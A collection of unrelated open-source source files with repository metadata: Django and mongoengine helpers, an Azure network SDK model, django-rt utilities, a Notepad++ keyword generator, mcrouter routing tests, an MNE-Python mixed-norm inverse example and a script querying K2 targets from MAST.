    Persisted as {'_resource_name': <name>, '_pk': <pk>} so the correct
    resource class can be re-instantiated when reading.
    """
    def __init__(self, available_resources, fields=None, **kwargs):
        # Candidate resource objects this field may (de)serialize.
        self.available_resources = available_resources
        self.fields = fields
        super(DynamicResourceField, self).__init__(**kwargs)
    def to_mongo(self, value):
        # Match the value's manager against each candidate resource; on a
        # match, store a small dict naming the resource plus the pk.
        for resource in self.available_resources:
            if hasattr(value, '_manager') and isinstance(value._manager, resource.__class__):
                return {'_resource_name': resource._meta.name, '_pk': value._pk}
        return value
    def __get__(self, instance, owner):
        """Descriptor for retrieving a value from a field in a document.
        """
        if instance is None:
            # Document class being used rather than a document object
            return self
        # Get value from document instance if available
        return self.to_python(instance._data.get(self.name))
    def to_python(self, value):
        # Raw JSON strings are decoded first; undecodable input yields None.
        if isinstance(value, string_types):
            try:
                value = json.loads(value)
            except ValueError:
                return None
        resource_name = value['_resource_name'] if isinstance(value, dict) and '_resource_name' in value else None
        for resource in self.available_resources:
            # Already an instance of a candidate resource: return as-is.
            if isinstance(value, resource._meta.resource_instance_cls):
                return value
            # Otherwise rebuild the instance from the stored name + pk.
            if resource_name and resource_name == resource._meta.name:
                _pk = value.get('_pk')
                ret = resource(_pk)
                # getattr(ret, '_instance')
                return ret
        return None
    def validate(self, value):
        for resource in self.available_resources:
            if isinstance(value, resource._meta.resource_instance_cls):
                # NOTE(review): this attribute access looks like it forces a
                # lazy load (and raises if it fails) — confirm against the
                # resource implementation.
                getattr(resource._meta.resource_instance_cls, '_instance')
                return
        # An empty dict counts as a valid "unset" value.
        if isinstance(value, dict) and value == {}:
            return
        self.error('%s could not be converted to resource' % value)
class ResourceReferenceField(ReferenceField):
    """ReferenceField whose values round-trip through a MongoResource wrapper."""
    def __init__(self, document_type, fields=None, exclude=None, cache_key_format=None, **kwargs):
        # Imported here rather than at module top — presumably to avoid a
        # circular import with the rest framework; confirm before moving.
        from django_town.rest.resources import MongoResource
        self.resource = MongoResource(document_type, fields=fields, exclude=exclude, cache_key_format=cache_key_format)
        self.fields = fields
        super(ResourceReferenceField, self).__init__(document_type, **kwargs)
    def to_mongo(self, value):
        # Store resource instances by primary key; pass raw values through.
        # print 'to_mongo', value
        if isinstance(value, self.resource._meta.resource_instance_cls):
            return value._pk
        return value
    def to_python(self, value):
        # Wrap raw pks in the resource class; instances pass through.
        # print 'to_python', value
        if isinstance(value, self.resource._meta.resource_instance_cls):
            return value
        return self.resource(value)
    def validate(self, value):
        # Non-instances fall through to the error() call on the next line.
        if isinstance(value, self.resource._meta.resource_instance_cls):
            return
self.error('%s could not be converted to resource' % value) | {
"content_hash": "b2e937c66c7b810460d85abca586871e",
"timestamp": "",
"source": "github",
"line_count": 175,
"max_line_length": 119,
"avg_line_length": 35.10285714285714,
"alnum_prop": 0.6141950187204949,
"repo_name": "uptown/django-town",
"id": "9cf0f7f0d9416808a0e5b0eb1f938c239ae00e48",
"size": "6143",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_town/mongoengine_extension/fields/base.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "382389"
}
],
"symlink_target": ""
} |
from django import template
from django.template.loader import render_to_string
from impacts_world.core.models import HeaderSettings
register = template.Library()
@register.simple_tag(takes_context=True)
def header(context, *args, **kwargs):
    """Render the site header widget ('widgets/header.html').

    Builds the navigation links from the site's HeaderSettings, plus an
    optional "participate" link and banner. Extra keyword arguments are
    merged into the template context; pass ``show_banner=True`` to add the
    banner image and intro texts.
    """
    request = context['request']
    settings = HeaderSettings.for_site(request.site)
    page = context.get('page')
    links = []
    for link in settings.header_links.all():
        name = link.name
        target = link.target.specific
        # A link is "active" when it points at the page being rendered.
        active = bool(page and target == page)
        if target.url:
            links.append({'url': target.url, 'text': name, 'active': active})
    if settings.show_participate:
        name = settings.participate_name
        target = settings.participate_target.specific
        active = bool(page and target == page)
        if target.url:
            context['participate'] = {'url': target.url, 'text': name, 'active': active}
    if kwargs.get('show_banner', False):
        rendition = settings.banner_image.get_rendition('fill-1200x520-c100')
        context['banner'] = {
            'first_intro': settings.banner_first_intro,
            'second_intro': settings.banner_second_intro,
            'image': rendition.url,
        }
    context['links'] = links
    context.update(kwargs)
    # FIX: renamed local from `template` to avoid shadowing the imported
    # `django.template` module.
    template_name = 'widgets/header.html'
    return render_to_string(template_name, context=context.flatten())
| {
"content_hash": "27f3a0e88d6d86b7e3f09584e4d94a45",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 88,
"avg_line_length": 32.69565217391305,
"alnum_prop": 0.620345744680851,
"repo_name": "bruecksen/impacts-world",
"id": "c5e0519aedb3709dd00beb2de801b7a1a395492d",
"size": "1504",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "impacts_world/core/templatetags/header.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "32416"
},
{
"name": "HTML",
"bytes": "32355"
},
{
"name": "JavaScript",
"bytes": "4323"
},
{
"name": "Python",
"bytes": "508708"
},
{
"name": "Shell",
"bytes": "303"
}
],
"symlink_target": ""
} |
from .resource import Resource
class ExpressRouteCircuit(Resource):
    """ExpressRouteCircuit resource.
    Variables are only populated by the server, and will be ignored when
    sending a request.
    :param id: Resource ID.
    :type id: str
    :ivar name: Resource name.
    :vartype name: str
    :ivar type: Resource type.
    :vartype type: str
    :param location: Resource location.
    :type location: str
    :param tags: Resource tags.
    :type tags: dict[str, str]
    :param sku: The SKU.
    :type sku: ~azure.mgmt.network.v2017_11_01.models.ExpressRouteCircuitSku
    :param allow_classic_operations: Allow classic operations
    :type allow_classic_operations: bool
    :param circuit_provisioning_state: The CircuitProvisioningState state of
    the resource.
    :type circuit_provisioning_state: str
    :param service_provider_provisioning_state: The
    ServiceProviderProvisioningState state of the resource. Possible values
    are 'NotProvisioned', 'Provisioning', 'Provisioned', and 'Deprovisioning'.
    Possible values include: 'NotProvisioned', 'Provisioning', 'Provisioned',
    'Deprovisioning'
    :type service_provider_provisioning_state: str or
    ~azure.mgmt.network.v2017_11_01.models.ServiceProviderProvisioningState
    :param authorizations: The list of authorizations.
    :type authorizations:
    list[~azure.mgmt.network.v2017_11_01.models.ExpressRouteCircuitAuthorization]
    :param peerings: The list of peerings.
    :type peerings:
    list[~azure.mgmt.network.v2017_11_01.models.ExpressRouteCircuitPeering]
    :param service_key: The ServiceKey.
    :type service_key: str
    :param service_provider_notes: The ServiceProviderNotes.
    :type service_provider_notes: str
    :param service_provider_properties: The ServiceProviderProperties.
    :type service_provider_properties:
    ~azure.mgmt.network.v2017_11_01.models.ExpressRouteCircuitServiceProviderProperties
    :param provisioning_state: Gets the provisioning state of the public IP
    resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
    :type provisioning_state: str
    :param gateway_manager_etag: The GatewayManager Etag.
    :type gateway_manager_etag: str
    :ivar etag: Gets a unique read-only string that changes whenever the
    resource is updated.
    :vartype etag: str
    """
    # Fields marked readonly are populated by the server only; supplying
    # them on a request is rejected by the serializer.
    _validation = {
        'name': {'readonly': True},
        'type': {'readonly': True},
        'etag': {'readonly': True},
    }
    # Maps Python attribute names to their wire (JSON) keys and msrest types;
    # consumed by the msrest serializer/deserializer.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'location': {'key': 'location', 'type': 'str'},
        'tags': {'key': 'tags', 'type': '{str}'},
        'sku': {'key': 'sku', 'type': 'ExpressRouteCircuitSku'},
        'allow_classic_operations': {'key': 'properties.allowClassicOperations', 'type': 'bool'},
        'circuit_provisioning_state': {'key': 'properties.circuitProvisioningState', 'type': 'str'},
        'service_provider_provisioning_state': {'key': 'properties.serviceProviderProvisioningState', 'type': 'str'},
        'authorizations': {'key': 'properties.authorizations', 'type': '[ExpressRouteCircuitAuthorization]'},
        'peerings': {'key': 'properties.peerings', 'type': '[ExpressRouteCircuitPeering]'},
        'service_key': {'key': 'properties.serviceKey', 'type': 'str'},
        'service_provider_notes': {'key': 'properties.serviceProviderNotes', 'type': 'str'},
        'service_provider_properties': {'key': 'properties.serviceProviderProperties', 'type': 'ExpressRouteCircuitServiceProviderProperties'},
        'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
        'gateway_manager_etag': {'key': 'properties.gatewayManagerEtag', 'type': 'str'},
        'etag': {'key': 'etag', 'type': 'str'},
    }
    def __init__(self, **kwargs):
        super(ExpressRouteCircuit, self).__init__(**kwargs)
        self.sku = kwargs.get('sku', None)
        self.allow_classic_operations = kwargs.get('allow_classic_operations', None)
        self.circuit_provisioning_state = kwargs.get('circuit_provisioning_state', None)
        self.service_provider_provisioning_state = kwargs.get('service_provider_provisioning_state', None)
        self.authorizations = kwargs.get('authorizations', None)
        self.peerings = kwargs.get('peerings', None)
        self.service_key = kwargs.get('service_key', None)
        self.service_provider_notes = kwargs.get('service_provider_notes', None)
        self.service_provider_properties = kwargs.get('service_provider_properties', None)
        self.provisioning_state = kwargs.get('provisioning_state', None)
        self.gateway_manager_etag = kwargs.get('gateway_manager_etag', None)
        # Read-only (server-populated) field; never taken from kwargs.
        self.etag = None
| {
"content_hash": "a26f0321ce04f170bb99652211d25ff9",
"timestamp": "",
"source": "github",
"line_count": 96,
"max_line_length": 143,
"avg_line_length": 50.177083333333336,
"alnum_prop": 0.6765621756279843,
"repo_name": "lmazuel/azure-sdk-for-python",
"id": "e06b244936a1c97d92a74635442c15cda9aaf8cb",
"size": "5291",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "azure-mgmt-network/azure/mgmt/network/v2017_11_01/models/express_route_circuit.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "42572767"
}
],
"symlink_target": ""
} |
import json
import uuid
from datetime import datetime
from importlib import import_module
from urllib.parse import urlparse
from django.core.urlresolvers import resolve, Resolver404
from http.client import responses as REASON_PHRASES
from django_rt.settings import settings
class JsonDateTimeEncoder(json.JSONEncoder):
    """JSON encoder that serializes datetime objects as ISO-8601 strings."""
    def default(self, obj):
        # Only datetimes get special treatment; everything else defers to
        # the base encoder (which raises TypeError for unknown types).
        if not isinstance(obj, datetime):
            return json.JSONEncoder.default(self, obj)
        return obj.isoformat()
class SerializableObject:
    """Mixin defining a serialize/deserialize contract with JSON helpers.

    Subclasses must override serialize() and deserialize(); to_json() and
    from_json() are implemented in terms of those hooks.
    """
    def serialize(self):
        # Subclass responsibility.
        raise NotImplementedError('serialize() not implemented')
    @classmethod
    def deserialize(cls, data):
        # Subclass responsibility.
        raise NotImplementedError('deserialize() not implemented')
    def to_json(self):
        # Datetimes are emitted as ISO-8601 via JsonDateTimeEncoder.
        serialized = self.serialize()
        return json.dumps(serialized, cls=JsonDateTimeEncoder)
    @classmethod
    def from_json(cls, json_data):
        parsed = json.loads(json_data)
        return cls.deserialize(parsed)
def get_cors_headers(origin):
    """Return dict containing the appropriate CORS headers for a courier response, given the request origin."""
    def _allow_origin(origin):
        """Compute the Access-Control-Allow-Origin value for this origin."""
        configured = settings.RT_CORS_ALLOW_ORIGIN
        if not configured:
            # Unconfigured: wide open under DEBUG, disabled otherwise.
            return '*' if settings.DEBUG else None
        if configured == '*':
            return '*'
        # A bare string means a single allowed origin; normalize to a tuple.
        allowed = (configured,) if type(configured) is str else configured
        if origin and origin in allowed:
            return origin
        return None
    headers = {}
    value = _allow_origin(origin)
    if value:
        headers['Access-Control-Allow-Origin'] = value
    credentials = settings.RT_CORS_ALLOW_CREDENTIALS
    if credentials is not None:
        headers['Access-Control-Allow-Credentials'] = 'true' if credentials else 'false'
    return headers
def get_full_channel_name(channel):
    """Build the fully-qualified channel name: '<RT_PREFIX>:channel:<channel>'."""
    parts = (settings.RT_PREFIX, 'channel', channel)
    return ':'.join(parts)
def get_http_status_reason(status):
    """Return the standard HTTP reason phrase for *status*, or '' if unknown."""
    return REASON_PHRASES.get(status, '')
def verify_resource_view(route):
    """Resolve the specified route with Django and verify that the view class is actually a Django-RT resource.
    Will throw either a ResourceError or NotAnRtResource exception on failure."""
    from django_town.rest.resources import ResourceError, NotAnRtResourceError
    # Resolve the route; an unknown route maps to an HTTP 404 resource error.
    try:
        match = resolve(route)
    except Resolver404:
        raise ResourceError(404)
    # Look the view class up on its defining module.
    view_module = import_module(match.func.__module__)
    view_class = getattr(view_module, match.func.__name__)
    # A Django-RT resource advertises itself via a truthy '_rt_is_resource';
    # a missing or falsy attribute means this is not an RT resource.
    if not getattr(view_class, '_rt_is_resource', False):
        raise NotAnRtResourceError()
def generate_subscription_id():
    """Return a fresh random subscription id (32 lowercase hex characters)."""
    new_uuid = uuid.uuid4()
    return new_uuid.hex
def get_subscription_key(id):
    """Build the storage key for a subscription: '<RT_PREFIX>:subscription:<id>'."""
    parts = (settings.RT_PREFIX, 'subscription', id)
    return ':'.join(parts)
def get_django_url(url):
    """Attempt to parse the Django server URL. If url is None, use the URL from the RT_DJANGO_URL setting instead.
    Returns parsed URL.
    """
    target = url or settings.RT_DJANGO_URL
    # Tolerate a single trailing slash; anything more is rejected below.
    if target.endswith('/'):
        target = target[:-1]
    parsed = urlparse(target)
    # Nothing may follow the host/path: no params, query or fragment.
    if parsed.params or parsed.query or parsed.fragment:
        raise ValueError('Invalid Django server URL')
    if parsed.scheme == 'http':
        # Plain HTTP URLs must be host-only (no path component).
        if parsed.path:
            raise ValueError('Invalid Django server URL')
    elif parsed.scheme == 'http+unix':
        # Unix-socket URLs carry the socket path in .path, never a netloc.
        if parsed.netloc:
            raise ValueError('Invalid Django server URL')
    else:
        raise ValueError('Unsupported Django server URL scheme "%s"' % (parsed.scheme,))
    return parsed
| {
"content_hash": "114e648023cc585bb2bb99852666576b",
"timestamp": "",
"source": "github",
"line_count": 139,
"max_line_length": 114,
"avg_line_length": 31.27338129496403,
"alnum_prop": 0.6507936507936508,
"repo_name": "jhannington/django-rt",
"id": "f11191f2cd5d18f85e7f9ada988c3b59a58ce7c1",
"size": "4347",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_rt/utils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "37879"
}
],
"symlink_target": ""
} |
from sys import argv, exit
import re
from parse import parse
# Require exactly two arguments: the reference XML and the output file.
if len(argv) != 3:
    print('usage: {} <reference.xml> <out-xml-file>'.format(argv[0]))
    exit(1)

plugin = parse(argv[1])

with open(argv[2], 'w') as fxml:
    write = fxml.write
    # One <KeyWord func="yes"> entry per plugin command, with its signature.
    for cmd in plugin.commands:
        if plugin.short_name:
            func = 'sim{}.{}'.format(plugin.short_name, cmd.name)
        else:
            func = '{}{}'.format(plugin.command_prefix, cmd.name)
        write('<KeyWord name="{}" func="yes">\n'.format(func))
        write('<Overload retVal="{}">\n'.format(','.join(cmd.help_out_args_v)))
        for arg in cmd.help_in_args_v:
            write('<Param name="{}" />\n'.format(arg))
        write('</Overload>\n')
        write('</KeyWord>\n')
        write('\n')
    # One <KeyWord func="no"> entry per enum item, fully prefixed.
    for enum in plugin.enums:
        for item in enum.items:
            if plugin.short_name:
                prefix = 'sim{}.{}.'.format(plugin.short_name, enum.name)
            else:
                prefix = enum.item_prefix
            write('<KeyWord name="{}{}" func="no"/>\n'.format(prefix, item))
    write('\n')
| {
"content_hash": "d96238e74fc82c46b781860acaf74c1c",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 84,
"avg_line_length": 33.72727272727273,
"alnum_prop": 0.5435759209344115,
"repo_name": "EricssonResearch/scott-eu",
"id": "097fdb476d30aa0a615e4267ab5a2716f4150e18",
"size": "1113",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "simulation-ros/src/vrep_ros_interface/external/v_repStubsGen/generate_notepadplusplus_xml.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "557472"
},
{
"name": "C#",
"bytes": "53898"
},
{
"name": "C++",
"bytes": "209194"
},
{
"name": "CMake",
"bytes": "68861"
},
{
"name": "CSS",
"bytes": "7068"
},
{
"name": "Cuda",
"bytes": "13073"
},
{
"name": "Dockerfile",
"bytes": "13106"
},
{
"name": "Groovy",
"bytes": "5714"
},
{
"name": "HTML",
"bytes": "48278"
},
{
"name": "Java",
"bytes": "1097268"
},
{
"name": "JavaScript",
"bytes": "134624"
},
{
"name": "Kotlin",
"bytes": "120642"
},
{
"name": "Lua",
"bytes": "257969"
},
{
"name": "MATLAB",
"bytes": "910"
},
{
"name": "Makefile",
"bytes": "32165"
},
{
"name": "Objective-C",
"bytes": "3527"
},
{
"name": "Prolog",
"bytes": "33238"
},
{
"name": "Python",
"bytes": "1758831"
},
{
"name": "Scala",
"bytes": "2494"
},
{
"name": "Shell",
"bytes": "9731"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from mcrouter.test.MCProcess import *
from mcrouter.test.McrouterTestCase import McrouterTestCase
class TestLogicalRoutingPolicies(McrouterTestCase):
    """Checks that logical route prefixes reach the expected backend."""
    config = './mcrouter/test/test_logical_routing_policies.json'
    extra_args = []

    def setUp(self):
        # Single memcached backend shared by all routing cases.
        self.mc = self.add_server(Memcached())

    def _check_route(self, route, key, value):
        """Start a mcrouter on `route` and verify a set reaches the backend."""
        mcrouter = self.add_mcrouter(self.config, route,
                                     extra_args=self.extra_args)
        mcrouter.set(key, value)
        self.assertEqual(self.mc.get(key), value)

    def test_different_cluster(self):
        self._check_route('/region1/cluster2/', 'foo1', 'value1')

    def test_different_region_cluster(self):
        self._check_route('/region2/cluster3/', 'foo2', 'value2')
| {
"content_hash": "b520c6ac8d814664b872ac557d2a3d54",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 71,
"avg_line_length": 35.766666666666666,
"alnum_prop": 0.6346691519105312,
"repo_name": "247687009/mcrouter",
"id": "4a38becde1c1e2f179df899b3b44476cc1009f14",
"size": "1362",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "mcrouter/test/test_logical_routing_policies.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
"""
urlquery module
"""
import cache
import database
def compose_response(is_malware=False):
    """Build the API response payload: {'malware': 'True' | 'False'}."""
    return {"malware": str(is_malware)}
def exists_in_cache(url, cache_hostname):
    """Return whether *url* is present in the cache at *cache_hostname*."""
    return cache.exists(url, cache_hostname)
def exists_in_database(url, db_hostname, table_name, conf):
    """Return True if *url* is flagged as malware in the database, else False.

    Normalizes whatever truthy/falsy value the backend query returns into
    a strict bool (replaces the verbose if/else True/False of the original).
    """
    return bool(database.query_url(url, db_hostname, table_name, conf))
def write_to_cache(url, hostname, conf):
    """Record *url* in the cache at *hostname*; returns the backend's result."""
    return cache.write(url, hostname, conf)
def delete_from_cache(url, hostname):
    """Remove *url* from the cache at *hostname*; returns the backend's result."""
    return cache.delete(url, hostname)
def process_url(url, hostname, table_name, conf):
    """Classify *url* as malware or not, consulting the cache before the DB.

    A database hit is written back to the cache so subsequent lookups are
    served without touching the database. (The original duplicated the
    final compose_response() call in both branches; it is now shared.)
    """
    if exists_in_cache(url, hostname):
        return compose_response(is_malware=True)
    is_malware = exists_in_database(url, hostname, table_name, conf)
    if is_malware:
        # Populate the cache so the next lookup short-circuits.
        write_to_cache(url, hostname, conf)
    return compose_response(is_malware)
| {
"content_hash": "062a4fb4af794b4f0fc390f865b8d22a",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 72,
"avg_line_length": 26.333333333333332,
"alnum_prop": 0.6611489776046738,
"repo_name": "vitovitolo/yama",
"id": "e82e4fc6291f943d0c427139e4ff13fae8314521",
"size": "1027",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "yama/urlquery.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Pascal",
"bytes": "21"
},
{
"name": "Puppet",
"bytes": "21621"
},
{
"name": "Python",
"bytes": "14147"
},
{
"name": "Ruby",
"bytes": "956"
},
{
"name": "Shell",
"bytes": "1882"
}
],
"symlink_target": ""
} |
"""
================================================================
Compute sparse inverse solution with mixed norm: MxNE and irMxNE
================================================================
Runs an (ir)MxNE (L1/L2 [1]_ or L0.5/L2 [2]_ mixed norm) inverse solver.
L0.5/L2 is done with irMxNE which allows for sparser
source estimates with less amplitude bias due to the non-convexity
of the L0.5/L2 mixed norm penalty.
References
----------
.. [1] Gramfort A., Kowalski M. and Hamalainen, M.
"Mixed-norm estimates for the M/EEG inverse problem using accelerated
gradient methods", Physics in Medicine and Biology, 2012.
https://doi.org/10.1088/0031-9155/57/7/1937.
.. [2] Strohmeier D., Haueisen J., and Gramfort A.
"Improved MEG/EEG source localization with reweighted mixed-norms",
4th International Workshop on Pattern Recognition in Neuroimaging,
Tuebingen, 2014. 10.1109/PRNI.2014.6858545
"""
# Author: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Daniel Strohmeier <daniel.strohmeier@tu-ilmenau.de>
#
# License: BSD (3-clause)
import numpy as np
import mne
from mne.datasets import sample
from mne.inverse_sparse import mixed_norm, make_stc_from_dipoles
from mne.minimum_norm import make_inverse_operator, apply_inverse
from mne.viz import (plot_sparse_source_estimates,
                     plot_dipole_locations, plot_dipole_amplitudes)
print(__doc__)
# Paths into the MNE "sample" dataset: forward solution, evoked averages,
# noise covariance and the FreeSurfer subjects directory.
data_path = sample.data_path()
fwd_fname = data_path + '/MEG/sample/sample_audvis-meg-eeg-oct-6-fwd.fif'
ave_fname = data_path + '/MEG/sample/sample_audvis-ave.fif'
cov_fname = data_path + '/MEG/sample/sample_audvis-shrunk-cov.fif'
subjects_dir = data_path + '/subjects'
# Read noise covariance matrix
cov = mne.read_cov(cov_fname)
# Handling average file
condition = 'Left Auditory'
evoked = mne.read_evokeds(ave_fname, condition=condition, baseline=(None, 0))
evoked.crop(tmin=0, tmax=0.3)
# Handling forward solution
forward = mne.read_forward_solution(fwd_fname)
###############################################################################
# Run solver
alpha = 55 # regularization parameter between 0 and 100 (100 is high)
loose, depth = 0.2, 0.9 # loose orientation & depth weighting
n_mxne_iter = 10 # if > 1 use L0.5/L2 reweighted mixed norm solver
# if n_mxne_iter > 1 dSPM weighting can be avoided.
# Compute dSPM solution to be used as weights in MxNE
inverse_operator = make_inverse_operator(evoked.info, forward, cov,
                                         depth=depth, fixed=True,
                                         use_cps=True)
stc_dspm = apply_inverse(evoked, inverse_operator, lambda2=1. / 9.,
                         method='dSPM')
# Compute (ir)MxNE inverse solution with dipole output
dipoles, residual = mixed_norm(
    evoked, forward, cov, alpha, loose=loose, depth=depth, maxit=3000,
    tol=1e-4, active_set_size=10, debias=True, weights=stc_dspm,
    weights_min=8., n_mxne_iter=n_mxne_iter, return_residual=True,
    return_as_dipoles=True)
###############################################################################
# Plot dipole activations
plot_dipole_amplitudes(dipoles)
# Plot dipole location of the strongest dipole with MRI slices
idx = np.argmax([np.max(np.abs(dip.amplitude)) for dip in dipoles])
plot_dipole_locations(dipoles[idx], forward['mri_head_t'], 'sample',
                      subjects_dir=subjects_dir, mode='orthoview',
                      idx='amplitude')
# # Plot dipole locations of all dipoles with MRI slices
# for dip in dipoles:
#     plot_dipole_locations(dip, forward['mri_head_t'], 'sample',
#                           subjects_dir=subjects_dir, mode='orthoview',
#                           idx='amplitude')
###############################################################################
# Plot residual
ylim = dict(eeg=[-10, 10], grad=[-400, 400], mag=[-600, 600])
evoked.pick_types(meg=True, eeg=True, exclude='bads')
evoked.plot(ylim=ylim, proj=True, time_unit='s')
residual.pick_types(meg=True, eeg=True, exclude='bads')
residual.plot(ylim=ylim, proj=True, time_unit='s')
###############################################################################
# Generate stc from dipoles
stc = make_stc_from_dipoles(dipoles, forward['src'])
###############################################################################
# View in 2D and 3D ("glass" brain like 3D plot)
solver = "MxNE" if n_mxne_iter == 1 else "irMxNE"
plot_sparse_source_estimates(forward['src'], stc, bgcolor=(1, 1, 1),
                             fig_name="%s (cond %s)" % (solver, condition),
                             opacity=0.1)
###############################################################################
# Morph onto fsaverage brain and view
stc_fsaverage = stc.morph(subject_from='sample', subject_to='fsaverage',
                          grade=None, sparse=True, subjects_dir=subjects_dir)
src_fsaverage_fname = subjects_dir + '/fsaverage/bem/fsaverage-ico-5-src.fif'
src_fsaverage = mne.read_source_spaces(src_fsaverage_fname)
plot_sparse_source_estimates(src_fsaverage, stc_fsaverage, bgcolor=(1, 1, 1),
                             fig_name="Morphed %s (cond %s)" % (solver,
                                                                condition), opacity=0.1)
| {
"content_hash": "92e66d4f491bc64b28b8110b1bb9c47d",
"timestamp": "",
"source": "github",
"line_count": 119,
"max_line_length": 79,
"avg_line_length": 43.924369747899156,
"alnum_prop": 0.5953701932274728,
"repo_name": "teonlamont/mne-python",
"id": "0cf660cf0840886a5e7f21e392797114c235398a",
"size": "5227",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "examples/inverse/plot_mixed_norm_inverse.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "3117"
},
{
"name": "PowerShell",
"bytes": "2988"
},
{
"name": "Python",
"bytes": "4354605"
},
{
"name": "Shell",
"bytes": "936"
}
],
"symlink_target": ""
} |
"""
Created on Fri Jul 31 09:45:08 2015
@author: fmullall
"""
import matplotlib.pyplot as mp
import numpy as np
import queryMast
import nca
class QueryK2ByTgtId(queryMast.QueryMast):
    """Query the MAST for K2 data by Investigation ID.

    All the code that does the work lives in QueryMast / AbstractDataQuery;
    this class only supplies the catalogue name and cache prefix, and knows
    how to build the search URL for a given investigation id.
    """
    def __init__(self):
        self.cachePrefix = "k2invest"
        queryMast.QueryMast.__init__(self)
        self.catalogueName = "k2/data_search"
        # NOTE(review): cachePrefix is set both before and after the parent
        # __init__ in the original — presumably deliberate; confirm.
        self.cachePrefix = "k2invest"
    def constructUrl(self, investigationId):
        """Return the MAST search URL for the given investigation id."""
        if self.catalogueName is None:
            raise NotImplementedError("Daughter class must set self.catalogueName!")
        # Accept ints as well as strings.
        if isinstance(investigationId, int):
            investigationId = "%i" %(investigationId)
        outputCols = "ktc_k2_id,sci_campaign,ktc_investigation_id,sci_ra,sci_dec,kp"
        pieces = [
            'http://archive.stsci.edu/',
            '%s/search.php?' %(self.catalogueName),
            'action=Search',
            "&ktc_investigation_id=*%s*" %(investigationId),
            '&coordformat=dec',
            '&outputformat=CSV',
            '&selectedColumnsCsv=%s' %(outputCols),
            '&verb=0',
        ]
        return ''.join(pieces)
    def queryProposal(self, investigationId):
        """Fetch (possibly cached) search results for one proposal id."""
        return self.query(0, 0, 0,
                          url=self.constructUrl(investigationId),
                          cacheDir="cache")
def main():
    """Download K2 target lists for several C3 proposals and merge them.

    Returns an nca.Nca catalogue of unique targets with an added
    'Proposal' column naming the proposal each target came from.
    """
    # (investigation id, short label) pairs to download.
    props = []
    props.append( (3111, 'WD_Kilic'))
    props.append( (3116, 'WD_Redfield'))
    props.append( (3096, 'EXO_Heller'))
    props.append( (3095, 'EXO_vanGrootel'))
    props.append( (3086, 'EB_Southworth'))
    props.append( (3067, 'EB_Peters'))
    props.append( (3049, 'EB_Prsa'))
    props.append( (3005, 'EB_Shporer'))
    #
    combined = []
    qm = QueryK2ByTgtId()
    for p in props:
        print "Getting %s" %(p[1])
        text = qm.queryProposal(p[0])
        data = qm.parseResults(text)
        # data[1:, :] skips the first row — presumably a header; confirm.
        data = appendCol(data[1:, :], 'Proposal')
        data[:, 'Proposal'] = p[1]
        combined.append(data)
    cat = np.concatenate(combined)
    # Keep only the first occurrence of each target id (column 0).
    idx= np.unique(cat[:,0], return_index=True)[1]
    cat = cat[idx]
    cat = nca.Nca(cat)
    # NOTE(review): uses `data` from the final loop iteration for the column
    # lookup — valid only because every proposal shares the same columns.
    cat.setLookup(1, data.lookup[1])
    return cat
import tools
def printCat(cat):
    """Write catalogue *cat* to K2C3cat.txt with a descriptive header.

    Each row is space-joined into one line, then the whole table is
    re-spaced into aligned columns by tools.respace().
    """
    text = [" ".join(row) for row in cat]
    # NOTE(review): "algortihm" typo preserved from the original header text.
    headerStr = "Example K2C3 stars for algortihm testing"
    colNames = cat.lookup[1]
    hdr = tools.createHeader(headerStr, columnNames=colNames)
    # 'with' guarantees the file is closed even if a write fails
    # (the original leaked the handle on exception).
    with open("K2C3cat.txt", 'w') as fp:
        fp.write("\n".join(hdr))
        fp.write("\n")
        fp.write("\n".join(tools.respace(text)))
def appendCol(data, name):
    """Return a new Nca with an extra column *name* appended to *data*.

    The new column is initialized with a copy of column 0; callers are
    expected to overwrite it (see main()).
    """
    # Removed the original's unused `nr, nc = data.shape` / dead `nc += 1`.
    # Duplicate column 0 as an (nrows x 1) array and stack it on the right.
    newCol = np.atleast_2d(data[:, 0].asarray()).transpose()
    newData = np.hstack((data.asarray(), newCol))
    # NOTE(review): this mutates data.lookup in place as well as reusing it
    # for the new object — presumably acceptable for this script; confirm.
    lookup = data.lookup
    lookup[1].append(name)
    return nca.Nca(newData, lookup)
| {
"content_hash": "7ae0d3d08acc5c0e239b1d2f873250b6",
"timestamp": "",
"source": "github",
"line_count": 119,
"max_line_length": 84,
"avg_line_length": 26.11764705882353,
"alnum_prop": 0.6052123552123552,
"repo_name": "barentsen/dave",
"id": "d186b8bd9718fc41edf307af0e9667da25c99728",
"size": "3132",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "exampleTargets/C3/getTargets.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "28133"
},
{
"name": "C++",
"bytes": "94566"
},
{
"name": "Fortran",
"bytes": "326733"
},
{
"name": "Jupyter Notebook",
"bytes": "826626"
},
{
"name": "M",
"bytes": "239"
},
{
